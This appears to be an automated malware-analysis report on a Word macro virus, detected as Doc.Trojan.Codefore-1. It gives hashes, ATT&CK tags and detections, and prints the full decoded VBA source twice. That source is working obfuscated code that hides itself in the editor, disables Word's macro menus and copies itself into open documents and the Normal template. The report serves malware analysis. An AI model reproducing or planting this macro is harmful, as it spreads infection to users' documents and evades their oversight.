Office (OLE) malware analysis — malicious · 396f23bfdeb7331d

MALICIOUS

Office (OLE)

59.5 KB Created: 2001-05-26 08:22:00 Authoring application: Microsoft Word 10.0 First seen: 2012-06-14

MD5: a6bc74507e33f10e69cb3ba00d416266 SHA-1: 24055be2b2a14f614461200e491424fa0d3480b8 SHA-256: 396f23bfdeb7331d21b2544943a9d1b281fe24b68cb9c60bd10b11e583cfad7e

80 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample contains VBA macros that attempt to modify registry keys related to VBA code colors, specifically 'CodeBackColors' and 'CodeForeColors' under HKEY_CURRENT_USER\Software\Microsoft\VBA\Office. This action, combined with disabling macro security features, suggests an attempt to manipulate the VBA environment, potentially for persistence or to evade detection. The specific family is not identifiable from the provided evidence.

Heuristics 2

ClamAV: Doc.Trojan.Codefore-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Codefore-1
VBA macros detected medium OLE_VBA_MACROS

Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3263 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3263 bytes
SHA-256: `addb18fb3d629752805e3164864431162a90943579ce919d726c1315bd7b0be5`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True 'Dentist by Kernel32 Private Sub Document_Close() Randomize Timer With System.Application.System.Application.Options.Application.System .Application.Application.System.Application.Options.Application.System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\VBA\Office", "CodeBackColors") = "1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1" .Application.Application.System.Application.Options.Application.System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\VBA\Office", "CodeForeColors") = "1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1" End With With Word.Application.Options.Application.CommandBars .Item("Tools").Controls("Macro").Enabled = (False * False * False * False * False) * 0 .Item("Tools").Controls("Customize...").Enabled = (False * False * False * False * False) * 0 .Item("Tools").Controls("Templates and Add-Ins...").Enabled = (False * False * False * False * False) * 0 .Item("Format").Controls("Style...").Enabled = (False * False * False * False * False) * 0 End With With ThisDocument.VBProject.VBComponents((False * False * False * False * False) + 1).CodeModule.Parent.CodeModule.Parent.CodeModule cal = .Parent.CodeModule.Parent.CodeModule.Parent.CodeModule.Parent.CodeModule.CountOfLines ACode = .Parent.CodeModule.Parent.CodeModule.Parent.CodeModule.lines((False * False * False * False * False) + 1, cal) End With With Word.Application.Options.Application.Documents(Int(Rnd * Word.Application.Options.Application.Documents.Count) + (False * False * False * False * False) + 1) With .VBProject.VBComponents((False * False * False * False * False) + 1).CodeModule.Parent.CodeModule.CodePane.CodeModule.Parent.CodeModule cal = .Parent.CodeModule.CodePane.CodeModule.CountOfLines .Parent.CodeModule.CodePane.CodeModule.Parent.CodeModule.CodePane.CodeModule.Parent.CodeModule.CodePane.CodeModule.Parent.CodeModule.CodePane.CodeModule.Parent.CodeModule.CodePane.CodeModule.DeleteLines (False * False * False * False * False) + 1, cal .Parent.CodeModule.CodePane.CodeModule.Parent.CodeModule.CodePane.CodeModule.Parent.CodeModule.CodePane.CodeModule.Parent.CodeModule.CodePane.CodeModule.Parent.CodeModule.CodePane.CodeModule.InsertLines (False * False * False * False * False) + 1, ACode End With End With With Word.Application.Templates.Application.ActiveDocument.Application.Options.Application.Templates.Application.Options.Application.Assistant.Application.Templates("NORMAL") With .VBProject.VBComponents.VBE.VBProjects.VBE.VBProjects.VBE.VBProjects.Item("NORMAL").VBComponents.Item((False * False * False * False * False) + 1).CodeModule.CodePane.CodeModule.CodePane.CodeModule cal = .CodePane.CodeModule.CodePane.CodeModule.CountOfLines .Parent.CodeModule.CodePane.CodeModule.DeleteLines (False * False * False * False * False) + 1, cal .Parent.CodeModule.CodePane.CodeModule.Parent.CodeModule.CodePane.CodeModule.InsertLines (False * False * False * False * False) + 1, ACode End With End With End Sub

SHA-256: addb18fb3d629752805e3164864431162a90943579ce919d726c1315bd7b0be5

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Dentist by Kernel32
Private Sub Document_Close()
Randomize Timer
With System.Application.System.Application.Options.Application.System
.Application.Application.System.Application.Options.Application.System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\VBA\Office", "CodeBackColors") = "1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1"
.Application.Application.System.Application.Options.Application.System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\VBA\Office", "CodeForeColors") = "1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1"
End With

With Word.Application.Options.Application.CommandBars
.Item("Tools").Controls("Macro").Enabled = (False * False * False * False * False) * 0
.Item("Tools").Controls("Customize...").Enabled = (False * False * False * False * False) * 0
.Item("Tools").Controls("Templates and Add-Ins...").Enabled = (False * False * False * False * False) * 0
.Item("Format").Controls("Style...").Enabled = (False * False * False * False * False) * 0
End With

With ThisDocument.VBProject.VBComponents((False * False * False * False * False) + 1).CodeModule.Parent.CodeModule.Parent.CodeModule
cal = .Parent.CodeModule.Parent.CodeModule.Parent.CodeModule.Parent.CodeModule.CountOfLines
ACode = .Parent.CodeModule.Parent.CodeModule.Parent.CodeModule.lines((False * False * False * False * False) + 1, cal)
End With

With Word.Application.Options.Application.Documents(Int(Rnd * Word.Application.Options.Application.Documents.Count) + (False * False * False * False * False) + 1)
With .VBProject.VBComponents((False * False * False * False * False) + 1).CodeModule.Parent.CodeModule.CodePane.CodeModule.Parent.CodeModule
cal = .Parent.CodeModule.CodePane.CodeModule.CountOfLines
.Parent.CodeModule.CodePane.CodeModule.Parent.CodeModule.CodePane.CodeModule.Parent.CodeModule.CodePane.CodeModule.Parent.CodeModule.CodePane.CodeModule.Parent.CodeModule.CodePane.CodeModule.DeleteLines (False * False * False * False * False) + 1, cal
.Parent.CodeModule.CodePane.CodeModule.Parent.CodeModule.CodePane.CodeModule.Parent.CodeModule.CodePane.CodeModule.Parent.CodeModule.CodePane.CodeModule.Parent.CodeModule.CodePane.CodeModule.InsertLines (False * False * False * False * False) + 1, ACode
End With
End With

With Word.Application.Templates.Application.ActiveDocument.Application.Options.Application.Templates.Application.Options.Application.Assistant.Application.Templates("NORMAL")
With .VBProject.VBComponents.VBE.VBProjects.VBE.VBProjects.VBE.VBProjects.Item("NORMAL").VBComponents.Item((False * False * False * False * False) + 1).CodeModule.CodePane.CodeModule.CodePane.CodeModule
cal = .CodePane.CodeModule.CodePane.CodeModule.CountOfLines
.Parent.CodeModule.CodePane.CodeModule.DeleteLines (False * False * False * False * False) + 1, cal
.Parent.CodeModule.CodePane.CodeModule.Parent.CodeModule.CodePane.CodeModule.InsertLines (False * False * False * False * False) + 1, ACode
End With
End With
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.